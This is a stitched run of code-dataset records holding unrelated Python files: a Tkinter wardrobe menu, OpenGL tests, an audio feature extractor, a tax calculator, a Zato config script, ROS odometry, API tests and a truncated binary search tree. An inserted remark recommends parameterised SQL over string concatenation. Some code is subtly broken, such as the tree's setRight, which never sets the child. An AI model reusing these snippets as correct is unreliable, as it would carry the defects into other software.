sheetDblClick2)\n\n    return\n\n\n######## Main Menu ########\nmainMenu = Menu(window)\nwindow.config(menu=mainMenu)\n\n## Add the status bar\nstatus = Label(window, text='이미지 정보:', bd=1, relief=SUNKEN, anchor=W)\nstatus.pack(side=BOTTOM, fill=X)\n\n######## MENU 1. Search ########\nsearchMenu = Menu(mainMenu)\nmainMenu.add_cascade(label = \"검색\", menu=searchMenu)\n\nsearchMenu.add_cascade(label=\"옷장 검색\", command=menuSearch1)\n\n######## MENU 2. Add ########\naddMenu = Menu(mainMenu)\nmainMenu.add_cascade(label = \"추가\", menu=addMenu)\n\naddMenu.add_cascade(label=\"옷 추가하기\", command=menuAdd1)\n\n######## MENU 3. Clothing Info Search ########\nclothsMenu = Menu(mainMenu)\nmainMenu.add_cascade(label = \"옷 정보\", menu=clothsMenu)\n\nclothsMenu.add_cascade(label=\"가격 정보 검색\", command=menuPrice)\nclothsMenu.add_cascade(label=\"최근 착용일 검색\", command=menuRecent)\n\n######## MENU 4. Styling ########\n# styleMenu = Menu(mainMenu)\n#\n# sMenu=Menu(styleMenu)\n#\n# mainMenu.add_cascade(label = \"스타일링\", menu=styleMenu)\n# styleMenu.add_cascade(label=\"action\", menu=sMenu, command=None)\n# sMenu.add_cascade(label = \"스타일링\", command=None)\n# sMenu.add_cascade(label = \"옷 색상 바꾸기\", command=None)\n\n######## MENU 5. Style Book ########\nstyleBookMenu = Menu(mainMenu)\n\naddStyleMenu=Menu(styleBookMenu)\n\nmainMenu.add_cascade(label = \"스타일 북\", menu=styleBookMenu)\nstyleBookMenu.add_command(label=\"추가하기\", command=menuAddStyleBook)\nstyleBookMenu.add_command(label=\"스타일 불러오기\", command=menuCallStyle)\n\nstyleBookMenu.add_cascade(label=\"필터 적용하기\", menu=addStyleMenu)\naddStyleMenu.add_cascade(label =\"필터1\", command=menuAddStyleBook)\naddStyleMenu.add_cascade(label =\"필터2\", command=None)\n\n######## MENU 6. Print ########\nprintMenu = Menu(mainMenu)\n\nmainMenu.add_cascade(label=\"프린트하기\", menu=printMenu)\nprintMenu.add_cascade(label=\"프린트하기\", command=menuPrint)  # pass the filename.\n\n\n######## MENU 7. Image Processing ########\nimageMenu = Menu(mainMenu)\n\nmainMenu.add_cascade(label=\"이미지 프로세싱\", menu=imageMenu)\nimageMenu.add_cascade(label=\"배경제거\", command=menuRemoveBG)  # pass the filename.\n\nwindow.mainloop()","sub_path":"mysql-python/MyProject/ver02-fileOpen2Cv.py","file_name":"ver02-fileOpen2Cv.py","file_ext":"py","file_size_in_byte":24335,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"51"}
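Every query in the file above is assembled by concatenating values into the SQL string (for example `"... where cloth_idx=" + str(id)`). pymssql supports `%s` placeholder parameters, which removes quoting problems and SQL injection risk; a minimal sketch of the same lookups using the connection settings from the code above:

```python
# Sketch: the same lookups with placeholder parameters instead of string
# concatenation (pymssql uses %s-style placeholders for all value types).
con = pymssql.connect(host=IP_ADDR, user=USER_NAME, password=USER_PASS,
                      database=DB_NAME, charset='utf8')
cur = con.cursor()
cur.execute("SELECT imageInfo, width, height FROM Image WHERE cloth_idx = %s", (id,))
image_row = cur.fetchone()
cur.execute("SELECT items FROM Wearing WHERE idx = %s", (id,))
wearing_row = cur.fetchone()
cur.close()
con.close()
```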
{"seq_id":"578944243","text":"from unittest import TestCase, skip\nfrom sys import stdout\nimport os.path\nimport logging\nimport traceback\nimport numpy as np\nimport OpenGL\nOpenGL.ERROR_CHECKING = False\nOpenGL.ERROR_LOGGING = False\nOpenGL.ERROR_ON_COPY = True\nimport OpenGL.GL as gl\nimport cyglfw3 as glfw\n\n\n_logger = logging.getLogger(__name__)\n\n\nfrom poolvr.cue import PoolCue\nfrom poolvr.table import PoolTable\nfrom poolvr.gl_rendering import OpenGLRenderer, Texture, Material, Mesh\nfrom poolvr.techniques import EGA_TECHNIQUE, LAMBERT_TECHNIQUE\nfrom poolvr.app import setup_glfw, BG_COLOR, TEXTURES_DIR\nfrom poolvr.billboards import BillboardParticles\nfrom poolvr.keyboard_controls import init_keyboard\nimport poolvr.primitives\n\n\nSCREENSHOTS_DIR = os.path.join(os.path.dirname(__file__), 'screenshots')\n\n\nclass OpenGLTests(TestCase):\n    show = True\n\n    @skip\n    def test_cone_mesh(self):\n        material = Material(LAMBERT_TECHNIQUE, values={'u_color': [1.0, 1.0, 0.0, 0.0]})\n        mesh = poolvr.primitives.ConeMesh(material, radius=0.15, height=0.3)\n        for prim in mesh.primitives[material]:\n            prim.attributes['a_position'] = prim.attributes['vertices']\n        mesh.world_matrix[3,2] = -3\n        self._view(meshes=[mesh])\n\n\n    def test_sphere_mesh(self):\n        material = Material(LAMBERT_TECHNIQUE, values={'u_color': [0.0, 1.0, 1.0, 0.0]})\n        prim = poolvr.primitives.SpherePrimitive(radius=0.1)\n        prim.attributes['a_position'] = prim.attributes['vertices']\n        mesh = Mesh({material: [prim]})\n        mesh.world_matrix[3,2] = -3\n        self._view(meshes=[mesh])\n\n\n    def _view(self, meshes=None, window_size=(800,600)):\n        if meshes is None:\n            meshes = []\n        title = traceback.extract_stack(None, 2)[0][2]\n        window, renderer = setup_glfw(width=window_size[0], height=window_size[1], double_buffered=True,\n                                      title=title)\n        camera_world_matrix = renderer.camera_matrix\n        camera_position = camera_world_matrix[3,:3]\n        gl.glViewport(0, 0, window_size[0], window_size[1])\n        gl.glClearColor(*BG_COLOR)\n        gl.glEnable(gl.GL_DEPTH_TEST)\n        for mesh in meshes:\n            mesh.init_gl(force=True)\n        def on_resize(window, width, height):\n            gl.glViewport(0, 0, width, height)\n            renderer.window_size = (width, height)\n            renderer.update_projection_matrix()\n        glfw.SetWindowSizeCallback(window, on_resize)\n        process_keyboard_input = init_keyboard(window)\n\n        _logger.info('entering render loop...')\n        stdout.flush()\n\n        nframes = 0\n        max_frame_time = 0.0\n        lt = glfw.GetTime()\n        while not glfw.WindowShouldClose(window):\n            t = glfw.GetTime()\n            dt = t - lt\n            lt = t\n            glfw.PollEvents()\n            renderer.process_input()\n            process_keyboard_input(dt, camera_world_matrix)\n            with renderer.render(meshes=meshes):\n                pass\n            max_frame_time = max(max_frame_time, dt)\n            if nframes == 0:\n                st = glfw.GetTime()\n            nframes += 1\n            glfw.SwapBuffers(window)\n\n        _logger.info('...exited render loop: average FPS: %f, maximum frame time: %f',\n                     (nframes - 1) / (t - st), max_frame_time)\n\n        renderer.shutdown()\n        _logger.info('...shut down renderer')\n        glfw.DestroyWindow(window)\n        glfw.Terminate()\n","sub_path":"test/opengl_tests.py","file_name":"opengl_tests.py","file_ext":"py","file_size_in_byte":3440,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"51"} {"seq_id":"95885060","text":"import argparse\nfrom common.param.FeatureExtractor import FeatureExtractor\nfrom common.config.Configuration import get_parameters\n\nparser = argparse.ArgumentParser(description='extract features from the training data')\nparser.add_argument('feature_configuration', help='feature configuration file')\nparser.add_argument('--raw', dest='raw_audio', help='file containing samples of raw audio')\nparser.add_argument('--fea', dest='output_features', help='file where features will be written to')\nparser.add_argument('--bat', dest='batch', help='batch file containing pairs [rawFile featureFile]')\nparser.add_argument('--wrp', dest='warp_factor', type=float, default=1.0, help='warp factor')\nparser.add_argument('--nrm', dest='cepstral_normalization_mode', choices=['none', 'utterance', 'session'],\n                    default='utterance', help='cepstral normalization mode')\nparser.add_argument('--met', dest='cepstral_normalization_method', choices=['CMN', 'CMVN'], default='CMN',\n                    help='cepstral normalization method')\nparser.add_argument('--hlt', dest='halt', default=False, const=True, action='store_const',\n                    help='whether to halt the batch processing if an error is found')\nargs = parser.parse_args()\n\nif args.batch and (args.raw_audio or args.output_features):\n    raise ValueError('--bat cannot be combined with --raw or --fea')\nelif args.raw_audio and not args.output_features:\n    raise ValueError('--raw also requires --fea')\nelif args.output_features and not args.raw_audio:\n    raise ValueError('--fea also requires --raw')\nelif not args.batch and not args.raw_audio:\n    raise ValueError('either --bat or the pair --raw/--fea must be given')\n\n# get the parameters\n\n# load the configuration file\nconfiguration_features = get_parameters(args.feature_configuration, 'features.json')\n\n# perform the parameterization\n \n# load the parameters\ncepstral_buffer_size = -1\nfeature_extractor = FeatureExtractor(configuration_features, args.warp_factor, cepstral_buffer_size,\n                                     args.cepstral_normalization_mode, args.cepstral_normalization_method)\n\nif not args.batch:\n    feature_extractor.extract_features(args.raw_audio, args.output_features)\nelse:\n    feature_extractor.extract_features_batch(args.batch, 
args.halt)","sub_path":"tools/mainParam.py","file_name":"mainParam.py","file_ext":"py","file_size_in_byte":2120,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"51"} +{"seq_id":"574677596","text":"#!/usr/bin/env python3\nimport sys\nimport csv\nimport os\nimport time\nfrom multiprocessing import Process,Queue\n\n\n\nclass Args(object):\n def __init__(self):\n self.args = sys.argv[1:]\n self.get_args(self.args)\n\n def get_args(self,line_args):\n #mytmp_list = []\n try:\n index = line_args.index('-c')\n self.config_file = line_args[index+1]\n except ValueError:\n print(\"args -c error!\")\n exit(-1)\n\n #mytmp_list.append(self.config_file)\n try:\n index = line_args.index('-d')\n self.user_file = line_args[index+1]\n except ValueError:\n print(\"args -d error!\")\n exit(-2)\n\n #mytmp_list.append(self.user_file)\n try:\n index = line_args.index('-o')\n self.gongzi_file = line_args[index+1]\n except ValueError:\n print(\"args -o error!\")\n exit(-3)\n\n #mytmp_list.append(self.gongzi_file)\n \n #print(mytmp_list)\n #print(self.config_file,self.user_file,self.gongzi_file)\n #return self.config_file,self.user_file,self.gongzi_file\n #return mytmp_list\n return None\n \n\nclass Config(object):\n config_dict = {}\n def __init__(self,configfile):\n self._config = self._read_config(configfile)\n\n def _read_config(self,configfile):\n #config_dict = {}\n\n with open(configfile,'r') as cf:\n for line in cf:\n mylist = (line.strip()).split(\"=\")\n self.config_dict[mylist[0].strip()] = mylist[1].strip()\n\n return self.config_dict\n\n\nclass IncomeTaxcalculator(object):\n\n def __init__(self,conf_dict,userdata):\n self.gongzi_list = self.jisuan_gongzi(conf_dict,userdata)\n\n def jisuan_gongzi(self,conf_dict,userdata):\n gongzi_list = []\n \n jiaofei_bili = float(conf_dict['YangLao']) + float(conf_dict['YiLiao']) + float(conf_dict['ShiYe']) + float(conf_dict['GongShang']) + float(conf_dict['ShengYu']) + float(conf_dict['GongJiJin'])\n \n #shui_qian_gongzi = float(userdata[-1][1])\n shui_qian_gongzi = float(userdata[1])\n if shui_qian_gongzi < float(conf_dict['JiShuL']) :\n she_bao = float(conf_dict['JiShuL']) * jiaofei_bili\n elif shui_qian_gongzi > float(conf_dict['JiShuH']) :\n she_bao = float(conf_dict['JiShuH']) * jiaofei_bili\n else :\n she_bao = shui_qian_gongzi * jiaofei_bili\n\n ying_na_shui_e = (shui_qian_gongzi - she_bao - 3500)\n if ying_na_shui_e > 80000 :\n ying_na_shui = (ying_na_shui_e * 0.45 - 13505)\n elif ying_na_shui_e > 55000 :\n ying_na_shui = (ying_na_shui_e * 0.35 - 5505)\n elif ying_na_shui_e > 35000 :\n ying_na_shui = (ying_na_shui_e * 0.30 - 2755)\n elif ying_na_shui_e > 9000 :\n ying_na_shui = (ying_na_shui_e * 0.25 - 1005)\n elif ying_na_shui_e > 4500 :\n ying_na_shui = (ying_na_shui_e * 0.20 - 555)\n elif ying_na_shui_e > 1500 :\n ying_na_shui = (ying_na_shui_e * 0.10 - 105)\n elif ying_na_shui_e > 0 :\n ying_na_shui = (ying_na_shui_e * 0.03)\n else :\n ying_na_shui = 0\n\n shui_huo_gongzi = (shui_qian_gongzi - ying_na_shui - she_bao)\n\n #gongzi_list.append(userdata[-1][0])\n #gongzi_list.append(userdata[-1][1])\n gongzi_list.append(userdata[0])\n gongzi_list.append(userdata[1])\n gongzi_list.append(str(format(she_bao,\".2f\")))\n gongzi_list.append(str(format(ying_na_shui,\".2f\")))\n gongzi_list.append(str(format(shui_huo_gongzi,\".2f\")))\n\n return gongzi_list\n #return a list for cun fang shui huo gongzi\n\n# *************\n#\"\"\"\n#class UserData(object):\n#\n# def __init__(self,userfile,conf_dict,gongzi_file):\n# 
self.userdata = self._read_users_data(userfile,conf_dict,gongzi_file)\n#\n# def _read_users_data(self,userfile,conf_dict,gongzi_file):\n# userdata = []\n# with open(gongzi_file,'w+') as gf:\n#\n# with open(userfile,'r') as uf:\n# for line in uf:\n# userdata.append((line.strip()).split(\",\"))\n# #userdata is 2 wei shuzu\n# income_tax = IncomeTaxcalculator(conf_dict,userdata)\n# print(income_tax.gongzi_list)\n# csv.writer(gf).writerow(income_tax.gongzi_list)\n#\n#\n# return userdata\n#\"\"\"\n\ndef proc1(*args):\n userfile = args[1]\n userdata = []\n with open(userfile,'r') as uf:\n for line in uf:\n userdata.append((line.strip()).split(','))\n queue1.put(userdata[-1],True,1)\n print('Send userdata :{}'.format(userdata[-1]))\n #time.sleep(1)\n\ndef proc2(*args):\n conf_dict = args[2]\n while True:\n #if (not queue1.empty()) :\n try:\n income_tax = IncomeTaxcalculator(conf_dict,queue1.get(True,1))\n queue2.put(income_tax.gongzi_list,True,1)\n print('Send gongzi_list :{}'.format(income_tax.gongzi_list))\n #time.sleep(1)\n except :\n return None\n\ndef proc3(*args):\n gongzi_file = args[1]\n print(\"gongzi_file ==> {}\".format(gongzi_file))\n gongzi_list = []\n with open(gongzi_file,'w+') as gf:\n while True:\n #if (not queue2.empty()):\n try:\n #gf.seek(2,0)\n gongzi_list = queue2.get(True,1)\n print(\"gongzi_list = {}\".format(gongzi_list))\n csv.writer(gf).writerow(gongzi_list)\n #csv.writer(gf).writerow(queue2.get(True,1))\n #time.sleep(1)\n except :\n return None\n\nif __name__ == '__main__':\n if len(sys.argv) <= 1 :\n print(\"Usage:{} -c test.cfg -d user.csv -o gongzi.csv\".format(sys.argv[0]))\n else:\n queue1 = Queue()\n queue2 = Queue()\n chuli_args = Args()\n #print(chuli_args.config_file)\n #print(chuli_args.user_file)\n \n chuli_config = Config(chuli_args.config_file)\n #print(chuli_config.config_dict)\n \n #chuli_user = UserData(chuli_args.user_file,chuli_config.config_dict,chuli_args.gongzi_file)\n #print(chuli_user.userdata)\n\n #Process(target = proc1,args=(queue1,chuli_args.user_file)).start()\n #Process(target = proc2,args=(queue1,queue2,chuli_config.config_dict)).start()\n #Process(target = proc1,args=(queue2,chuli_args.gongzi_file)).start()\n p1 = Process(target = proc1,args=(queue1,chuli_args.user_file))\n p2 = Process(target = proc2,args=(queue1,queue2,chuli_config.config_dict))\n p3 = Process(target = proc3,args=(queue2,chuli_args.gongzi_file))\n\n p1.start()\n p2.start()\n p3.start()\n\n time.sleep(3) # Important zeng jia yanchi shi de queue not empty \n # in order to bao zheng queue1 queue2 not empty when \n # proc1 proc2 proc3 beginning!!!\n if (queue1.empty() and queue2.empty()) :\n p1.terminate()\n p1.join()\n #if (queue2.empty()):\n p2.terminate()\n p2.join()\n p3.terminate()\n p3.join()\n\n\n\n\n","sub_path":"calculator-multi.py","file_name":"calculator-multi.py","file_ext":"py","file_size_in_byte":7247,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"51"} +{"seq_id":"284398287","text":"#!/opt/zato/current/bin/python\n# -*- coding: utf-8 -*-\n\n\"\"\"\nCopyright (C) 2019, Zato Source s.r.o. https://zato.io\nLicensed under LGPLv3, see LICENSE.txt for terms and conditions.\n\nconfigset.py is used to dockerize Zato components. 
This script allows you to configure Zato's server.conf and sso.conf by environment variables.\n\nExamples:\nserver__component_enabled__sso=True configures server.conf [component_enabled] sso with value 'True'\nsso__signup__is_approval_needed=False configures sso.conf [signup] is_approval_needed with value 'False'\n\n\"\"\"\n\nimport os\nimport configobj\n\nserver_config_changed = False\nserver_config_path = '/opt/zato/env/qs-1/config/repo/server.conf'\nserver_config = configobj.ConfigObj(server_config_path, use_zato=False)\n\nsso_config_changed = False\nsso_config_path = '/opt/zato/env/qs-1/config/repo/sso.conf'\nsso_config = configobj.ConfigObj(sso_config_path, use_zato=False)\n\ndef patch(key, value):\n parts = key.split('__')\n filename = parts.pop(0) + '.conf'\n key = parts.pop(-1)\n nestedSections = parts\n print(filename, nestedSections, key, value)\n _patch(filename, nestedSections, key, value)\n\ndef _patch(filename, nestedSections, key, value):\n global server_config_changed\n global sso_config_changed\n if filename == 'server.conf':\n config = None\n for n in nestedSections:\n if config:\n config = config.get(n, {})\n else:\n config = server_config.get(n, {})\n config[key] = value\n server_config_changed = True\n if filename == 'sso.conf':\n config = None\n for n in nestedSections:\n if config:\n config = config[n]\n else:\n config = sso_config.get(n, {})\n config[key] = value\n sso_config_changed = True\n\n# Patch config file based on environment format:\n# server__section_key=value -> server.conf [section] key = value\n# sso__section_key=value -> sso.conf [section] key = value\nfor i in os.environ:\n if 'server__' in str(i):\n patch(i, os.environ.get(i) )\n if 'sso__' in str(i):\n patch(i, os.environ.get(i) )\n\n# Patch lagacy environment variables\nZATO_SSO = os.environ.get('ZATO_SSO')\nif ZATO_SSO == 'y':\n patch('server__component_enabled__sso', 'True')\nZATO_SSO_IS_APPROVAL_NEEDED = os.environ.get('ZATO_SSO_IS_APPROVAL_NEEDED')\nif ZATO_SSO_IS_APPROVAL_NEEDED == 'n':\n patch('sso__signup__is_approval_needed', 'False')\n\n# Overwrite configuration files\nif server_config_changed:\n server_config.write()\n\nif sso_config_changed:\n sso_config.write()\n\n","sub_path":"docker/cloud/configset.py","file_name":"configset.py","file_ext":"py","file_size_in_byte":2584,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"51"} +{"seq_id":"385122946","text":"import os\nimport math\n\nCHUNK_SIZE = 1024*1024 # 1MB\n\n\ndef get_total_file_chunks(filename):\n return math.ceil(os.path.getsize(filename) / CHUNK_SIZE)\n \ndef get_file_chunks(filename): \n with open(filename, 'rb') as f:\n while True: \n piece = f.read(CHUNK_SIZE);\n if not piece:\n break\n yield piece\n\ndef write_file_chunks(message):\n file_name = message.origin + \"_\" + str(message.id)\n with open(file_name, \"ab\") as myfile:\n myfile.write(message.data)","sub_path":"samples/ring/utils/file_utils.py","file_name":"file_utils.py","file_ext":"py","file_size_in_byte":533,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"51"} +{"seq_id":"479757398","text":"#!/usr/bin/env python\n\nimport tf\nimport os\nimport math\nimport time\nimport rospy\nimport tf2_ros\nimport threading\nimport numpy as np\nimport geometry_msgs.msg\nfrom std_msgs.msg import Float64\nfrom qualisys.msg import Subject\nfrom nav_msgs.msg import Odometry\n\n\n#####################################################\n# Initialize Threading Class 
#\n#####################################################\nclass ThreadedFunction(threading.Thread):\n\n    #####################################################\n    #              Initialize Object                    #\n    #####################################################\n    def __init__(self, fcn_to_thread):\n        threading.Thread.__init__(self)\n\n        self.runnable = fcn_to_thread\n        self.daemon = True\n\n    def run(self):\n        self.runnable()\n\n\nclass qualisys_odom_publisher():\n    def __init__(self):\n        #####################################################\n        #       Initialize Variables and Constants          #\n        #####################################################\n        self.ODOM_MOCAP_ACTIVE = False\n        self.MAIN_INTERFACE_STARTED = False\n        self.PARAMETERS_INITIALIZED = False\n        self.PARAMETER_UPDATED = False\n        self.UPDATE_PARAM_RATE = 10\n        self.UPDATE_PARAM_TIME = 1/self.UPDATE_PARAM_RATE\n        self.dt_interface = 0.4\n\n        self.x = 0\n        self.y = 0\n        self.x_prev = 0\n        self.y_prev = 0\n        self.time0 = 0\n        self.time1 = 0\n        self.dT = 0\n\n        rospy.init_node('qualisys_odom_node')\n        self.velocity = Float64()\n        self.br = tf2_ros.TransformBroadcaster()\n        self.pub = rospy.Publisher('qualisys/odom', Odometry, queue_size=1)\n        self.pub_vel = rospy.Publisher('qualisys/vel', Float64, queue_size=1)\n\n        self.t = geometry_msgs.msg.TransformStamped()\n\n        self.initial_odom = False\n        self.initial_x = 0\n        self.initial_y = 0\n        self.initial_z = 0\n        self.initial_roll = 0\n        self.initial_pitch = 0\n        self.initial_yaw = 0\n\n    #####################################################\n    #                  Clear Screen                     #\n    #####################################################\n    def cls(self):\n        os.system(\"clear\")\n\n    #####################################################\n    #                  SET PARAMETER                    #\n    #####################################################\n    def set_f1vt18_parameter(self, parameter_name, value=False):\n        resolved_global_name = \"/f1vt18/\" + parameter_name\n        rospy.set_param(resolved_global_name, value)\n\n    #####################################################\n    #                  GET PARAMETER                    #\n    #####################################################\n    def get_f1vt18_parameter(self, parameter_name, value=False):\n        resolved_global_name = \"/f1vt18/\" + parameter_name\n        return rospy.get_param(resolved_global_name, value)\n\n    #####################################################\n    #               UPDATE PARAMETERS                   #\n    #####################################################\n    def update_parameters(self):\n        while not rospy.is_shutdown():\n            while not self.PARAMETERS_INITIALIZED:\n                self.PARAMETERS_INITIALIZED = self.get_f1vt18_parameter(\"PARAMETERS_INITIALIZED\")\n                pass\n\n            # UPDATE PARAMETERS HERE\n            self.PARAMETER_UPDATED = True\n            self.set_f1vt18_parameter(\"ODOM_MOCAP_ACTIVE\", self.ODOM_MOCAP_ACTIVE)\n            time.sleep(self.UPDATE_PARAM_TIME)\n            self.ODOM_MOCAP_ACTIVE = False\n            self.set_f1vt18_parameter(\"ODOM_MOCAP_ACTIVE\", self.ODOM_MOCAP_ACTIVE)\n\n    def initialize_subscriber(self):\n        rospy.Subscriber('/qualisys/V1', Subject, self.publish_odom_callback)\n        while not rospy.is_shutdown():\n            rospy.spin()\n\n    def publish_odom_callback(self, msg):\n        self.ODOM_MOCAP_ACTIVE = True\n        if not self.initial_odom:  # capture the initial pose only once\n            self.initial_odom = True\n            self.initial_x = msg.position.x\n            self.initial_y = msg.position.y\n            self.initial_z = msg.position.z\n            (self.initial_roll, self.initial_pitch, self.initial_yaw) = tf.transformations.euler_from_quaternion(\n                [msg.orientation.x, msg.orientation.y, msg.orientation.z, msg.orientation.w])\n\n        distance_x = msg.position.x - self.initial_x\n        distance_y = msg.position.y - self.initial_y\n\n        current_time = rospy.Time.now()\n
self.t.header.stamp = current_time\n self.t.header.frame_id = \"odom\"\n self.t.child_frame_id = \"f1vt18_CG\"\n self.t.transform.translation.x = np.cos(self.initial_yaw) * distance_x + np.sin(self.initial_yaw) * distance_y\n self.t.transform.translation.y = -np.sin(self.initial_yaw) * distance_x + np.cos(self.initial_yaw) * distance_y\n self.t.transform.translation.z = 0.0\n\n (self.current_roll, self.current_pitch, self.current_yaw) = tf.transformations.euler_from_quaternion(\n [msg.orientation.x, msg.orientation.y, msg.orientation.z, msg.orientation.w])\n\n theta = self.current_yaw - self.initial_yaw\n q = tf.transformations.quaternion_from_euler(0, 0, theta)\n self.t.transform.rotation.x = q[0]\n self.t.transform.rotation.y = q[1]\n self.t.transform.rotation.z = q[2]\n self.t.transform.rotation.w = q[3]\n self.br.sendTransform(self.t)\n\n odom = Odometry()\n odom.header.stamp = current_time\n odom.header.frame_id = \"odom\"\n odom.child_frame_id = \"f1vt18_CG\"\n odom.pose.pose.position.x = self.t.transform.translation.x\n odom.pose.pose.position.y = self.t.transform.translation.y\n odom.pose.pose.position.z = 0.0\n odom.pose.pose.orientation.x = q[0]\n odom.pose.pose.orientation.y = q[1]\n odom.pose.pose.orientation.z = q[2]\n odom.pose.pose.orientation.w = q[3]\n self.pub.publish(odom)\n\n x_temp = odom.pose.pose.position.x\n y_temp = odom.pose.pose.position.y\n _, _, yaw_temp = tf.transformations.euler_from_quaternion(\n [odom.pose.pose.orientation.x, odom.pose.pose.orientation.y, odom.pose.pose.orientation.z,\n odom.pose.pose.orientation.w])\n #print(\"X: \" + str(x_temp) + \" Y: \" + str(yaw_temp) + \" Yaw: \" + str(yaw_temp * 180 / np.pi))\n self.x = msg.position.x # np.cos(yaw_temp)*x_temp + np.sin(yaw_temp)*y_temp\n self.y = msg.position.y # -np.sin(yaw_temp)*x_temp + np.cos(yaw_temp)*y_temp\n self.time1 = rospy.get_time()\n self.dT = self.time1 - self.time0\n self.velocity = (((self.x - self.x_prev) ** 2) / self.dT ** 2 + (\n (self.y - self.y_prev) ** 2) / self.dT ** 2) ** 0.5\n #print(\"Velocity in odom frame\" + str(self.velocity))\n self.velocity = np.cos(theta)*self.velocity - np.sin(theta)*self.velocity\n self.pub_vel.publish(self.velocity)\n self.x_prev = self.x\n self.y_prev = self.y\n self.time0 = rospy.get_time()\n\n#####################################################\n # Initialize Control Interface for Terminal #\n #####################################################\n def display_interface(self):\n #####################################################\n # WHILE LOOP for User Input #\n #####################################################\n while not rospy.is_shutdown():\n\n print(\"####################################\\r\")\n print(\" Waiting for PARAMETERS INI \\r\")\n print(\"------------------------------------\\r\")\n print('Press q if frozen... \\r')\n while not self.PARAMETERS_INITIALIZED and not rospy.is_shutdown():\n time.sleep(2)\n pass\n\n #####################################################\n # UPDATE PARAMETERS FROM ROS PARAMETER SERVER #\n #####################################################\n self.PARAMETER_UPDATED = False\n print(\"####################################\\r\")\n print(\" Waiting for PARAMETERS UPDATE \\r\")\n print(\"------------------------------------\\r\")\n print('Press q if frozen... 
\\r')\n while not self.PARAMETER_UPDATED and not rospy.is_shutdown():\n pass\n\n self.cls()\n #####################################################\n # ### Print Control Interface to Terminal ### #\n #####################################################\n #####################################################\n # Show current mode #\n #####################################################\n print(\"##################################\\r\")\n print(\"Mode: [x]= active | [-]= inactive \\r\")\n print(\"----------------------------------\\r\")\n print(\"----------------------------------\\r\")\n\n time.sleep(self.dt_interface)\n #self.cls()\n\n\nif __name__ == '__main__':\n try:\n print(\"----------------------------------\\r\")\n print(\"##################################\\r\")\n print(\"# PROGRAM HAS BEEN STARTED #\\r\")\n print(\"##################################\\r\")\n print(\"... initialize vehicle object \\r\")\n time.sleep(1)\n odom_pub = qualisys_odom_publisher()\n\n Thread_Publish_Emergency = ThreadedFunction(odom_pub.initialize_subscriber)\n Thread_Update_Parameters = ThreadedFunction(odom_pub.update_parameters)\n #Thread_Display_Interface = ThreadedFunction(odom_pub.display_interface)\n\n Thread_Publish_Emergency.start()\n Thread_Update_Parameters.start()\n #Thread_Display_Interface.start()\n odom_pub.display_interface()\n rospy.set_param('/f1vt18/MAIN_INTERFACE_STARTED', False)\n rospy.set_param('/f1vt18/PARAMETERS_INITIALIZED', False)\n except rospy.ROSInterruptException:\n pass\n","sub_path":"control/src/sim_feedback_mocap.py","file_name":"sim_feedback_mocap.py","file_ext":"py","file_size_in_byte":10170,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"51"} +{"seq_id":"411190832","text":"import pytest\nimport requests\nimport sys\nfrom faker import Faker\nfrom random import randint\n\n\ndef transfer(input_args, id_get):\n return {\"body\": {\"amount\": input_args[\"amount\"],\n \"author\": input_args[\"book_author\"],\n \"name\": input_args[\"book_name\"],\n \"id\": id_get}, \"status\": 200}\n\n\ndef find_book(json_obj, text):\n for t in text:\n if t[\"id\"] == json_obj[\"id\"] and \\\n t[\"amount\"] == json_obj[\"amount\"] and \\\n t[\"author\"] == json_obj[\"author\"] and \\\n t[\"name\"] == json_obj[\"name\"]:\n return True\n return False\n\n\ndef get_json():\n return {\"book_name\": Faker().sentence(nb_words=3), \"book_author\": Faker().name(), \"amount\": randint(0, 30)}\n\n\n@pytest.mark.parametrize(\"http_method\", [\"GET\", \"POST\"])\n@pytest.mark.parametrize(\"data_method\", [\"query\", \"json\"])\ndef test_add_book(http_method, data_method, get_url):\n \"\"\"\n Checks book adding\n\n :param http_method: HTTP method\n :param data_method: parameters json or query\n :param get_url: fixture that gets base url of API\n\n \"\"\"\n url = get_url + \"book/add\"\n data_list = get_json()\n sys.stdout.write(\"Method = {}, Url = {}, Data Method = {}, Parameters = {}\\n\"\n .format(http_method, url, data_method, data_list))\n\n if data_method == \"query\":\n response = requests.request(http_method, url, params=data_list)\n else:\n response = requests.request(http_method, url, json=data_list)\n\n sys.stdout.write(response.text + '\\n')\n if response.status_code == 405:\n pytest.skip(\"Bug 1 - book/add do not support POST\")\n assert response.status_code == 200, \"Status differs from the expected one\"\n\n json_obj = response.json()\n bk_id = json_obj[\"body\"][\"id\"]\n assert json_obj == transfer(data_list, bk_id), \"A book with incorrect data 
was added\"\n\n url = get_url + \"book\"\n assert requests.get(url, params={\"book_id\": bk_id}).json() == json_obj, \\\n \"Book on this identifier was not found\"\n\n url = get_url + \"books\"\n assert find_book(json_obj[\"body\"], requests.get(url).json()[\"body\"][\"books\"]), \\\n \"There is no new book in all books list\"\n","sub_path":"test_add_books.py","file_name":"test_add_books.py","file_ext":"py","file_size_in_byte":2210,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"51"} +{"seq_id":"456968172","text":"# this file is to implement a node-based Binary Search Tree\nclass Node():\n def __init__(self, value, left=None, right=None):\n self._value = value\n self._left = left\n self._right = right\n\n def getValue(self):\n return self._value\n\n def setValue(self, data):\n self._value = data\n\n def getLeft(self):\n return self._left\n\n def setLeft(self, Node):\n self._left = Node\n\n def getRight(self):\n return self._right\n\n def setRight(self, Node):\n return self._right\n\n def _str_(self):\n return \"{0:<10}{1:<10}{2:<10}\".format(\n str(self._left.getValue()) if self._left else \"None\",\n str(self._value),\n str(self._right.getValue()) if self._right else \"None\")\n\n\nclass BST():\n def __init__(self):\n self._root = None\n\n def isEmpty(self):\n return not self._root\n\n # wrap up methof for insertRecursive\n def insertR(self, data):\n if not self._root:\n self._root = Node(data)\n else:\n self.insertRecursive(data, self._root)\n\n def insertRecursive(self, data, current):\n if data < current.getValue():\n if not current.getLeft():\n current.setLeft(Node(data))\n # return\n else:\n self.insertRecursive(data, current.getLeft())\n else:\n if not current.getRight():\n current.setRight(Node(data))\n else:\n self.insertRecursive(data, current.getRight())\n\n def insertIterative(self, data):\n newNode = Node(data)\n # if it is empty\n if self.isEmpty():\n self._root = newNode\n return\n current = 